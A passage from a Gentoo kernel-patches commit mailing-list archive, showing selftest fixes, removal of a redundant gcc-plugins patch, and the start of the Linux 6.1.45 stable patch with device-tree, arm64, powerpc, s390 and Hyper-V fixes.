+ 	run_cmd "$IP link set dev lo up"
+ 
++	# Dump should not loop endlessly when maximum nexthop ID is configured.
++	run_cmd "$IP nexthop add id $((2**32-1)) blackhole"
++	run_cmd "timeout 5 $IP nexthop"
++	log_test $? 0 "Maximum nexthop ID dump"
++
+ 	#
+ 	# groups
+ 	#
+@@ -2201,6 +2206,11 @@ basic_res()
+ 	run_cmd "$IP nexthop bucket list fdb"
+ 	log_test $? 255 "Dump all nexthop buckets with invalid 'fdb' keyword"
+ 
++	# Dump should not loop endlessly when maximum nexthop ID is configured.
++	run_cmd "$IP nexthop add id $((2**32-1)) group 1/2 type resilient buckets 4"
++	run_cmd "timeout 5 $IP nexthop bucket"
++	log_test $? 0 "Maximum nexthop ID dump"
++
+ 	#
+ 	# resilient nexthop buckets get requests
+ 	#
+diff --git a/tools/testing/selftests/net/forwarding/ethtool.sh b/tools/testing/selftests/net/forwarding/ethtool.sh
+index dbb9fcf759e0f..aa2eafb7b2437 100755
+--- a/tools/testing/selftests/net/forwarding/ethtool.sh
++++ b/tools/testing/selftests/net/forwarding/ethtool.sh
+@@ -286,6 +286,8 @@ different_speeds_autoneg_on()
+ 	ethtool -s $h1 autoneg on
+ }
+ 
++skip_on_veth
++
+ trap cleanup EXIT
+ 
+ setup_prepare
+diff --git a/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh b/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh
+index 072faa77f53bd..17f89c3b7c020 100755
+--- a/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh
++++ b/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh
+@@ -108,6 +108,8 @@ no_cable()
+ 	ip link set dev $swp3 down
+ }
+ 
++skip_on_veth
++
+ setup_prepare
+ 
+ tests_run
+diff --git a/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh b/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh
+index eb9ec4a68f84b..7594bbb490292 100755
+--- a/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh
++++ b/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh
+@@ -99,6 +99,8 @@ test_stats_rx()
+ 	test_stats g2a rx
+ }
+ 
++skip_on_veth
++
+ trap cleanup EXIT
+ 
+ setup_prepare
+diff --git a/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh b/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh
+index 9f5b3e2e5e954..49fa94b53a1ca 100755
+--- a/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh
++++ b/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh
+@@ -14,6 +14,8 @@ ALL_TESTS="
+ NUM_NETIFS=4
+ source lib.sh
+ 
++require_command $TROUTE6
++
+ h1_create()
+ {
+ 	simple_if_init $h1 2001:1:1::2/64
+diff --git a/tools/testing/selftests/net/forwarding/lib.sh b/tools/testing/selftests/net/forwarding/lib.sh
+index f4721f1b2886b..06027772cf79a 100755
+--- a/tools/testing/selftests/net/forwarding/lib.sh
++++ b/tools/testing/selftests/net/forwarding/lib.sh
+@@ -30,6 +30,7 @@ REQUIRE_MZ=${REQUIRE_MZ:=yes}
+ REQUIRE_MTOOLS=${REQUIRE_MTOOLS:=no}
+ STABLE_MAC_ADDRS=${STABLE_MAC_ADDRS:=no}
+ TCPDUMP_EXTRA_FLAGS=${TCPDUMP_EXTRA_FLAGS:=}
++TROUTE6=${TROUTE6:=traceroute6}
+ 
+ relative_path="${BASH_SOURCE%/*}"
+ if [[ "$relative_path" == "${BASH_SOURCE}" ]]; then
+@@ -137,6 +138,17 @@ check_locked_port_support()
+ 	fi
+ }
+ 
++skip_on_veth()
++{
++	local kind=$(ip -j -d link show dev ${NETIFS[p1]} |
++		jq -r '.[].linkinfo.info_kind')
++
++	if [[ $kind == veth ]]; then
++		echo "SKIP: Test cannot be run with veth pairs"
++		exit $ksft_skip
++	fi
++}
++
+ if [[ "$(id -u)" -ne 0 ]]; then
+ 	echo "SKIP: need root privileges"
+ 	exit $ksft_skip
+@@ -199,6 +211,11 @@ create_netif_veth()
+ 	for ((i = 1; i <= NUM_NETIFS; ++i)); do
+ 		local j=$((i+1))
+ 
++		if [ -z ${NETIFS[p$i]} ]; then
++			echo "SKIP: Cannot create interface. Name not specified"
++			exit $ksft_skip
++		fi
++
+ 		ip link show dev ${NETIFS[p$i]} &> /dev/null
+ 		if [[ $? -ne 0 ]]; then
+ 			ip link add ${NETIFS[p$i]} type veth \
+diff --git a/tools/testing/selftests/net/forwarding/settings b/tools/testing/selftests/net/forwarding/settings
+new file mode 100644
+index 0000000000000..e7b9417537fbc
+--- /dev/null
++++ b/tools/testing/selftests/net/forwarding/settings
+@@ -0,0 +1 @@
++timeout=0
+diff --git a/tools/testing/selftests/net/forwarding/tc_flower.sh b/tools/testing/selftests/net/forwarding/tc_flower.sh
+index 683711f41aa9b..b1daad19b01ec 100755
+--- a/tools/testing/selftests/net/forwarding/tc_flower.sh
++++ b/tools/testing/selftests/net/forwarding/tc_flower.sh
+@@ -52,8 +52,8 @@ match_dst_mac_test()
+ 	tc_check_packets "dev $h2 ingress" 101 1
+ 	check_fail $? "Matched on a wrong filter"
+ 
+-	tc_check_packets "dev $h2 ingress" 102 1
+-	check_err $? "Did not match on correct filter"
++	tc_check_packets "dev $h2 ingress" 102 0
++	check_fail $? "Did not match on correct filter"
+ 
+ 	tc filter del dev $h2 ingress protocol ip pref 1 handle 101 flower
+ 	tc filter del dev $h2 ingress protocol ip pref 2 handle 102 flower
+@@ -78,8 +78,8 @@ match_src_mac_test()
+ 	tc_check_packets "dev $h2 ingress" 101 1
+ 	check_fail $? "Matched on a wrong filter"
+ 
+-	tc_check_packets "dev $h2 ingress" 102 1
+-	check_err $? "Did not match on correct filter"
++	tc_check_packets "dev $h2 ingress" 102 0
++	check_fail $? "Did not match on correct filter"
+ 
+ 	tc filter del dev $h2 ingress protocol ip pref 1 handle 101 flower
+ 	tc filter del dev $h2 ingress protocol ip pref 2 handle 102 flower
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a3108c3cff471..7b20878a1af59 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -650,6 +650,7 @@ pm_nl_del_endpoint()
+ 	local addr=$3
+ 
+ 	if [ $ip_mptcp -eq 1 ]; then
++		[ $id -ne 0 ] && addr=''
+ 		ip -n $ns mptcp endpoint delete id $id $addr
+ 	else
+ 		ip netns exec $ns ./pm_nl_ctl del $id $addr
+@@ -740,10 +741,11 @@ pm_nl_check_endpoint()
+ 	fi
+ 
+ 	if [ $ip_mptcp -eq 1 ]; then
++		# get line and trim trailing whitespace
+ 		line=$(ip -n $ns mptcp endpoint show $id)
++		line="${line% }"
+ 		# the dump order is: address id flags port dev
+-		expected_line="$addr"
+-		[ -n "$addr" ] && expected_line="$expected_line $addr"
++		[ -n "$addr" ] && expected_line="$addr"
+ 		expected_line="$expected_line $id"
+ 		[ -n "$_flags" ] && expected_line="$expected_line ${_flags//","/" "}"
+ 		[ -n "$dev" ] && expected_line="$expected_line $dev"
+diff --git a/tools/testing/selftests/rseq/Makefile b/tools/testing/selftests/rseq/Makefile
+index 3a173e184566c..cb5a9fc629fed 100644
+--- a/tools/testing/selftests/rseq/Makefile
++++ b/tools/testing/selftests/rseq/Makefile
+@@ -4,8 +4,10 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
++top_srcdir = ../../../..
++
+ CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -L$(OUTPUT) -Wl,-rpath=./ \
+-	  $(CLANG_FLAGS)
++	  $(CLANG_FLAGS) -I$(top_srcdir)/tools/include
+ LDLIBS += -lpthread -ldl
+ 
+ # Own dependencies because we only want to build against 1st prerequisite, but
+diff --git a/tools/testing/selftests/rseq/rseq.c b/tools/testing/selftests/rseq/rseq.c
+index b736a5169aad0..e20191fb40d49 100644
+--- a/tools/testing/selftests/rseq/rseq.c
++++ b/tools/testing/selftests/rseq/rseq.c
+@@ -29,6 +29,8 @@
+ #include <dlfcn.h>
+ #include <stddef.h>
+ 
++#include <linux/compiler.h>
++
+ #include "../kselftest.h"
+ #include "rseq.h"
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-16 18:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-16 18:32 UTC (permalink / raw
  To: gentoo-commits

commit:     ea90beb9c82adf6fda470602f76f36087cf9c712
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 16 18:32:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 16 18:32:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ea90beb9

Remove redundant patch

Removed:
2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ---
 ..._gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch | 41 ----------------------
 2 files changed, 45 deletions(-)

diff --git a/0000_README b/0000_README
index 0e741144..c1bcb313 100644
--- a/0000_README
+++ b/0000_README
@@ -255,10 +255,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
-From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
-Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
deleted file mode 100644
index 0b454ec8..00000000
--- a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-gcc-plugins: Reorganize gimple includes for GCC 13
-
-The gimple-iterator.h header must be included before gimple-fold.h
-starting with GCC 13. Reorganize gimple headers to work for all GCC
-versions.
-
-Reported-by: Palmer Dabbelt <palmer@rivosinc.com>
-Link: https://lore.kernel.org/all/20230113173033.4380-1-palmer@rivosinc.com/
-Cc: linux-hardening@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- scripts/gcc-plugins/gcc-common.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
-index 9a1895747b15..84c730da36dd 100644
---- a/scripts/gcc-plugins/gcc-common.h
-+++ b/scripts/gcc-plugins/gcc-common.h
-@@ -71,7 +71,9 @@
- #include "varasm.h"
- #include "stor-layout.h"
- #include "internal-fn.h"
-+#include "gimple.h"
- #include "gimple-expr.h"
-+#include "gimple-iterator.h"
- #include "gimple-fold.h"
- #include "context.h"
- #include "tree-ssa-alias.h"
-@@ -85,10 +87,8 @@
- #include "tree-eh.h"
- #include "stmt.h"
- #include "gimplify.h"
--#include "gimple.h"
- #include "tree-phinodes.h"
- #include "tree-cfg.h"
--#include "gimple-iterator.h"
- #include "gimple-ssa.h"
- #include "ssa-iterators.h"
- 
--- 
-2.34.1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-11 11:55 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-11 11:55 UTC (permalink / raw
  To: gentoo-commits

commit:     fe4e8e348309528622daba47768078aa5fd91e58
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Aug 11 11:55:10 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Aug 11 11:55:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=fe4e8e34

Linux patch 6.1.45

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1044_linux-6.1.45.patch | 5988 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5992 insertions(+)

diff --git a/0000_README b/0000_README
index 12241a14..93d96552 100644
--- a/0000_README
+++ b/0000_README
@@ -219,6 +219,10 @@ Patch:  1043_linux-6.1.44.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.44
 
+Patch:  1044_linux-6.1.45.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.45
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1044_linux-6.1.45.patch b/1044_linux-6.1.45.patch
new file mode 100644
index 00000000..22547410
--- /dev/null
+++ b/1044_linux-6.1.45.patch
@@ -0,0 +1,5988 @@
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index bbc80eff03f98..b3c8ac6a2c385 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -141,6 +141,10 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | MMU-500         | #841119,826419  | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | MMU-600         | #1076982,1209401| N/A                         |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | MMU-700         | #2268618,2812531| N/A                         |
+++----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Broadcom       | Brahma-B53      | N/A             | ARM64_ERRATUM_845719        |
+ +----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Makefile b/Makefile
+index 612f3d83629b4..82c958299e982 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 44
++SUBLEVEL = 45
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts
+index 48424e459f125..15b5651b88d03 100644
+--- a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts
++++ b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts
+@@ -128,7 +128,7 @@
+ 	status = "okay";
+ 	clock-frequency = <100000>;
+ 	i2c-sda-falling-time-ns = <890>;  /* hcnt */
+-	i2c-sdl-falling-time-ns = <890>;  /* lcnt */
++	i2c-scl-falling-time-ns = <890>;  /* lcnt */
+ 
+ 	adc@14 {
+ 		compatible = "lltc,ltc2497";
+diff --git a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts
+index 847a7c01f5af5..fcf640de90b6b 100644
+--- a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts
++++ b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts
+@@ -141,7 +141,7 @@
+ 	status = "okay";
+ 	clock-frequency = <100000>;
+ 	i2c-sda-falling-time-ns = <890>;  /* hcnt */
+-	i2c-sdl-falling-time-ns = <890>;  /* lcnt */
++	i2c-scl-falling-time-ns = <890>;  /* lcnt */
+ 
+ 	adc@14 {
+ 		compatible = "lltc,ltc2497";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts b/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts
+index 4a3df2b77b0be..6720ddf597839 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts
+@@ -141,7 +141,7 @@
+ };
+ 
+ &gpio1 {
+-	gpio-line-names = "nINT_ETHPHY", "LED_RED", "WDOG_INT", "X_RTC_INT",
++	gpio-line-names = "", "LED_RED", "WDOG_INT", "X_RTC_INT",
+ 		"", "", "", "RESET_ETHPHY",
+ 		"CAN_nINT", "CAN_EN", "nENABLE_FLATLINK", "",
+ 		"USB_OTG_VBUS_EN", "", "LED_GREEN", "LED_BLUE";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi
+index 995b44efb1b65..9d9b103c79c77 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi
+@@ -111,7 +111,7 @@
+ };
+ 
+ &gpio1 {
+-	gpio-line-names = "nINT_ETHPHY", "", "WDOG_INT", "X_RTC_INT",
++	gpio-line-names = "", "", "WDOG_INT", "X_RTC_INT",
+ 		"", "", "", "RESET_ETHPHY",
+ 		"", "", "nENABLE_FLATLINK";
+ };
+@@ -210,7 +210,7 @@
+ 				};
+ 			};
+ 
+-			reg_vdd_gpu: buck3 {
++			reg_vdd_vpu: buck3 {
+ 				regulator-always-on;
+ 				regulator-boot-on;
+ 				regulator-max-microvolt = <1000000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+index 8e861b920d09e..7c9b60f4da922 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+@@ -559,6 +559,10 @@
+ 	status = "okay";
+ };
+ 
++&disp_blk_ctrl {
++	status = "disabled";
++};
++
+ &pgc_mipi {
+ 	status = "disabled";
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts
+index a67771d021464..46a07dfc0086c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts
+@@ -617,6 +617,10 @@
+ 	status = "okay";
+ };
+ 
++&disp_blk_ctrl {
++	status = "disabled";
++};
++
+ &pgc_mipi {
+ 	status = "disabled";
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+index d053ef302fb82..faafefe562e4b 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+@@ -351,7 +351,7 @@
+ 			MX8MN_IOMUXC_ENET_RXC_ENET1_RGMII_RXC		0x91
+ 			MX8MN_IOMUXC_ENET_RX_CTL_ENET1_RGMII_RX_CTL	0x91
+ 			MX8MN_IOMUXC_ENET_TX_CTL_ENET1_RGMII_TX_CTL	0x1f
+-			MX8MN_IOMUXC_GPIO1_IO09_GPIO1_IO9		0x19
++			MX8MN_IOMUXC_GPIO1_IO09_GPIO1_IO9		0x159
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index 4724ed0cbff94..bf8f02c1535c1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -756,7 +756,7 @@
+ 									 <&clk IMX8MQ_SYS1_PLL_800M>,
+ 									 <&clk IMX8MQ_VPU_PLL>;
+ 						assigned-clock-rates = <600000000>,
+-								       <600000000>,
++								       <300000000>,
+ 								       <800000000>,
+ 								       <0>;
+ 					};
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 59aaf2e688336..356036babd093 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -634,7 +634,7 @@ static void fpsimd_to_sve(struct task_struct *task)
+ 	void *sst = task->thread.sve_state;
+ 	struct user_fpsimd_state const *fst = &task->thread.uw.fpsimd_state;
+ 
+-	if (!system_supports_sve())
++	if (!system_supports_sve() && !system_supports_sme())
+ 		return;
+ 
+ 	vq = sve_vq_from_vl(thread_get_cur_vl(&task->thread));
+@@ -660,7 +660,7 @@ static void sve_to_fpsimd(struct task_struct *task)
+ 	unsigned int i;
+ 	__uint128_t const *p;
+ 
+-	if (!system_supports_sve())
++	if (!system_supports_sve() && !system_supports_sme())
+ 		return;
+ 
+ 	vl = thread_get_cur_vl(&task->thread);
+@@ -791,7 +791,8 @@ void sve_sync_from_fpsimd_zeropad(struct task_struct *task)
+ 	void *sst = task->thread.sve_state;
+ 	struct user_fpsimd_state const *fst = &task->thread.uw.fpsimd_state;
+ 
+-	if (!test_tsk_thread_flag(task, TIF_SVE))
++	if (!test_tsk_thread_flag(task, TIF_SVE) &&
++	    !thread_sm_enabled(&task->thread))
+ 		return;
+ 
+ 	vq = sve_vq_from_vl(thread_get_cur_vl(&task->thread));
+@@ -863,7 +864,7 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 			 */
+ 			task->thread.svcr &= ~(SVCR_SM_MASK |
+ 					       SVCR_ZA_MASK);
+-			clear_thread_flag(TIF_SME);
++			clear_tsk_thread_flag(task, TIF_SME);
+ 			free_sme = true;
+ 		}
+ 	}
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index 92bc9a2d702cb..f19f020ccff96 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -937,11 +937,13 @@ static int sve_set_common(struct task_struct *target,
+ 	/*
+ 	 * Ensure target->thread.sve_state is up to date with target's
+ 	 * FPSIMD regs, so that a short copyin leaves trailing
+-	 * registers unmodified.  Always enable SVE even if going into
+-	 * streaming mode.
++	 * registers unmodified.  Only enable SVE if we are
++	 * configuring normal SVE, a system with streaming SVE may not
++	 * have normal SVE.
+ 	 */
+ 	fpsimd_sync_to_sve(target);
+-	set_tsk_thread_flag(target, TIF_SVE);
++	if (type == ARM64_VEC_SVE)
++		set_tsk_thread_flag(target, TIF_SVE);
+ 
+ 	BUILD_BUG_ON(SVE_PT_SVE_OFFSET != sizeof(header));
+ 	start = SVE_PT_SVE_OFFSET;
+diff --git a/arch/powerpc/include/asm/word-at-a-time.h b/arch/powerpc/include/asm/word-at-a-time.h
+index 46c31fb8748d5..30a12d2086871 100644
+--- a/arch/powerpc/include/asm/word-at-a-time.h
++++ b/arch/powerpc/include/asm/word-at-a-time.h
+@@ -34,7 +34,7 @@ static inline long find_zero(unsigned long mask)
+ 	return leading_zero_bits >> 3;
+ }
+ 
+-static inline bool has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
++static inline unsigned long has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
+ {
+ 	unsigned long rhs = val | c->low_bits;
+ 	*data = rhs;
+diff --git a/arch/powerpc/kernel/trace/ftrace_mprofile.S b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+index d031093bc4367..6f9c2dea905b7 100644
+--- a/arch/powerpc/kernel/trace/ftrace_mprofile.S
++++ b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+@@ -33,6 +33,9 @@
+  * and then arrange for the ftrace function to be called.
+  */
+ .macro	ftrace_regs_entry allregs
++	/* Create a minimal stack frame for representing B */
++	PPC_STLU	r1, -STACK_FRAME_MIN_SIZE(r1)
++
+ 	/* Create our stack frame + pt_regs */
+ 	PPC_STLU	r1,-SWITCH_FRAME_SIZE(r1)
+ 
+@@ -42,7 +45,7 @@
+ 
+ #ifdef CONFIG_PPC64
+ 	/* Save the original return address in A's stack frame */
+-	std	r0, LRSAVE+SWITCH_FRAME_SIZE(r1)
++	std	r0, LRSAVE+SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE(r1)
+ 	/* Ok to continue? */
+ 	lbz	r3, PACA_FTRACE_ENABLED(r13)
+ 	cmpdi	r3, 0
+@@ -77,6 +80,8 @@
+ 	mflr	r7
+ 	/* Save it as pt_regs->nip */
+ 	PPC_STL	r7, _NIP(r1)
++	/* Also save it in B's stackframe header for proper unwind */
++	PPC_STL	r7, LRSAVE+SWITCH_FRAME_SIZE(r1)
+ 	/* Save the read LR in pt_regs->link */
+ 	PPC_STL	r0, _LINK(r1)
+ 
+@@ -142,7 +147,7 @@
+ #endif
+ 
+ 	/* Pop our stack frame */
+-	addi r1, r1, SWITCH_FRAME_SIZE
++	addi r1, r1, SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE
+ 
+ #ifdef CONFIG_LIVEPATCH_64
+         /* Based on the cmpd above, if the NIP was altered handle livepatch */
+diff --git a/arch/powerpc/mm/init_64.c b/arch/powerpc/mm/init_64.c
+index fe1b83020e0df..0ec5b45b1e86a 100644
+--- a/arch/powerpc/mm/init_64.c
++++ b/arch/powerpc/mm/init_64.c
+@@ -314,8 +314,7 @@ void __ref vmemmap_free(unsigned long start, unsigned long end,
+ 	start = ALIGN_DOWN(start, page_size);
+ 	if (altmap) {
+ 		alt_start = altmap->base_pfn;
+-		alt_end = altmap->base_pfn + altmap->reserve +
+-			  altmap->free + altmap->alloc + altmap->align;
++		alt_end = altmap->base_pfn + altmap->reserve + altmap->free;
+ 	}
+ 
+ 	pr_debug("vmemmap_free %lx...%lx\n", start, end);
+diff --git a/arch/s390/kernel/sthyi.c b/arch/s390/kernel/sthyi.c
+index 4d141e2c132e5..2ea7f208f0e73 100644
+--- a/arch/s390/kernel/sthyi.c
++++ b/arch/s390/kernel/sthyi.c
+@@ -459,9 +459,9 @@ static int sthyi_update_cache(u64 *rc)
+  *
+  * Fills the destination with system information returned by the STHYI
+  * instruction. The data is generated by emulation or execution of STHYI,
+- * if available. The return value is the condition code that would be
+- * returned, the rc parameter is the return code which is passed in
+- * register R2 + 1.
++ * if available. The return value is either a negative error value or
++ * the condition code that would be returned, the rc parameter is the
++ * return code which is passed in register R2 + 1.
+  */
+ int sthyi_fill(void *dst, u64 *rc)
+ {
+diff --git a/arch/s390/kvm/intercept.c b/arch/s390/kvm/intercept.c
+index ee7478a601442..b37bb960bfaf0 100644
+--- a/arch/s390/kvm/intercept.c
++++ b/arch/s390/kvm/intercept.c
+@@ -389,8 +389,8 @@ static int handle_partial_execution(struct kvm_vcpu *vcpu)
+  */
+ int handle_sthyi(struct kvm_vcpu *vcpu)
+ {
+-	int reg1, reg2, r = 0;
+-	u64 code, addr, cc = 0, rc = 0;
++	int reg1, reg2, cc = 0, r = 0;
++	u64 code, addr, rc = 0;
+ 	struct sthyi_sctns *sctns = NULL;
+ 
+ 	if (!test_kvm_facility(vcpu->kvm, 74))
+@@ -421,7 +421,10 @@ int handle_sthyi(struct kvm_vcpu *vcpu)
+ 		return -ENOMEM;
+ 
+ 	cc = sthyi_fill(sctns, &rc);
+-
++	if (cc < 0) {
++		free_page((unsigned long)sctns);
++		return cc;
++	}
+ out:
+ 	if (!cc) {
+ 		if (kvm_s390_pv_cpu_is_protected(vcpu)) {
+diff --git a/arch/x86/hyperv/hv_init.c b/arch/x86/hyperv/hv_init.c
+index 85863b9c9e684..189ae92de4d06 100644
+--- a/arch/x86/hyperv/hv_init.c
++++ b/arch/x86/hyperv/hv_init.c
+@@ -14,6 +14,7 @@
+ #include <asm/apic.h>
+ #include <asm/desc.h>
+ #include <asm/sev.h>
++#include <asm/ibt.h>
+ #include <asm/hypervisor.h>
+ #include <asm/hyperv-tlfs.h>
+ #include <asm/mshyperv.h>
+@@ -467,6 +468,26 @@ void __init hyperv_init(void)
+ 		wrmsrl(HV_X64_MSR_HYPERCALL, hypercall_msr.as_uint64);
+ 	}
+ 
++	/*
++	 * Some versions of Hyper-V that provide IBT in guest VMs have a bug
++	 * in that there's no ENDBR64 instruction at the entry to the
++	 * hypercall page. Because hypercalls are invoked via an indirect call
++	 * to the hypercall page, all hypercall attempts fail when IBT is
++	 * enabled, and Linux panics. For such buggy versions, disable IBT.
++	 *
++	 * Fixed versions of Hyper-V always provide ENDBR64 on the hypercall
++	 * page, so if future Linux kernel versions enable IBT for 32-bit
++	 * builds, additional hypercall page hackery will be required here
++	 * to provide an ENDBR32.
++	 */
++#ifdef CONFIG_X86_KERNEL_IBT
++	if (cpu_feature_enabled(X86_FEATURE_IBT) &&
++	    *(u32 *)hv_hypercall_pg != gen_endbr()) {
++		setup_clear_cpu_cap(X86_FEATURE_IBT);
++		pr_warn("Hyper-V: Disabling IBT because of Hyper-V bug\n");
++	}
++#endif
++
+ 	/*
+ 	 * hyperv_init() is called before LAPIC is initialized: see
+ 	 * apic_intr_mode_init() -> x86_platform.apic_post_init() and
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index e721b8426c245..b122708792c4d 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -476,4 +476,5 @@
+ 
+ /* BUG word 2 */
+ #define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
